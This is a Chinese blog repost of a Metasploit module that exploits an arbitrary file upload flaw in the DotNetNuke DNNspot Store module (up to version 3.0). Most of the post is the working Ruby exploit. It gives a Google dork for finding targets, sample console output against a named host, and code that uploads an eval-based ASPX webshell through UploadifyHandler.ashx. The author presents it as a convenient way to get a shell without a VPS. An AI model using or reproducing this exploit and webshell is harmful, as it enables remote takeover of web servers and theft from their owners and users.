[MSF] DotNetNuke DNNspot Store <=3.0 GetShell exploit

时间：2015-04-19 16:15:32 阅读：492 评论：0 收藏：0 [点我收藏+]

MSF DotNetNuke DNNspot Store <=3.0 GetShell exploit by k8team
技术分享

MSF里很多EXP都是反弹shell的用起来不方便
1 没exe执行权限时有些东西就蛋碎了
2 是大部分人都没VPS,你弹到哪去啊
所以我弄了个直接上传webshell的脚本

DNNspot_upload_aspx.rb

# Exploit Title: DotNetNuke DNNspot Store <=3.0 GetShell exploit
# Date: 31/03/2015
# Author: K8team
# Version: 3.0.0
# Vendor: DNNspot
# Vendor URL: https://www.dnnspot.com
# Google Dork: inurl:/DesktopModules/DNNspot-Store/
#
#msf > use exploit/windows/http/DNNspot_upload_aspx
#msf exploit(DNNspot_upload_aspx) > set RHOST qqhack8.blog.163.com
#RHOST => qqhack8.blog.163.com
#msf exploit(DNNspot_upload_aspx) > exploit

#[*] Started reverse handler on 192.168.85.158:4444
#[*] qqhack8.blog.163.com:80 - Uploading payload...
#[*] K8WebShell: qqhack8.blog.163.com:80/DesktopModules/DNNspot-Store/ProductPhotos/hhmjrrhd.aspx
#[!] This exploit may require manual cleanup of ‘hhmjrrhd.aspx‘ on the target
#msf exploit(DNNspot_upload_aspx) >

require ‘msf/core‘

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
    super(update_info(info,
      ‘Name‘           => ‘DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitary File Upload‘,
      ‘Description‘    => %q{
        This module exploits an arbitrary file upload vulnerability found in DotNetNuke DNNspot Store
        module versions below 3.0.0.
      },
      ‘Author‘         =>
        [
          ‘Glafkos Charalambous <glafkos.charalambous[at]unithreat.com>‘
        ],
      ‘License‘        => MSF_LICENSE,
      ‘References‘     =>
        [
          [ ‘URL‘, ‘http://metasploit.com‘ ]
        ],
      ‘Platform‘       => ‘win‘,
      ‘Arch‘           => ARCH_X86,
      ‘Privileged‘     => false,
      ‘Targets‘        =>
        [
          [ ‘DNNspot-Store / Windows‘, {} ],
        ],
      ‘DefaultTarget‘ => 0,
      ‘DisclosureDate‘ => ‘Jul 21 2014‘))
end

def check
    res = send_request_cgi({
      ‘method‘ => ‘GET‘,
      ‘uri‘    => normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx")
    })

    if res and res.code == 200
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
end

def exploit
    @payload_name = "#{rand_text_alpha_lower(8)}.aspx"
    exe = generate_payload_exe
    aspx = Msf::Util::EXE.to_exe_aspx(exe)
    post_data = Rex::MIME::Message.new
    post_data.add_part("<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"tom\"],\"unsafe\");%>", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    post_data.add_part("/DesktopModules/DNNspot-Store/ProductPhotos/", nil, nil, "form-data; name=\"folder\"")
    post_data.add_part("1", nil, nil, "form-data; name=\"productId\"")
    post_data.add_part("w00t", nil, nil, "form-data; name=\"type\"")
    data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, ‘--_Part_‘)

    print_status("#{peer} - Uploading payload...")
    res = send_request_cgi({
      "method" => "POST",
      "uri"    => normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx"),
      "data"   => data,
      "ctype" => "multipart/form-data; boundary=#{post_data.bound}"
    })

    unless res and res.code == 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    register_files_for_cleanup(@payload_name)

    print_status("K8WebShell: #{peer}/DesktopModules/DNNspot-Store/ProductPhotos/#{@payload_name}")
    res = send_request_cgi({
    ‘method‘ => ‘GET‘,
      ‘uri‘    => normalize_uri("/DesktopModules/DNNspot-Store/ProductPhotos/",@payload_name)
    })
end
end

标签：dotnetnuke dnnspot s

原文地址：http://blog.csdn.net/jasonlu888/article/details/45129529

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行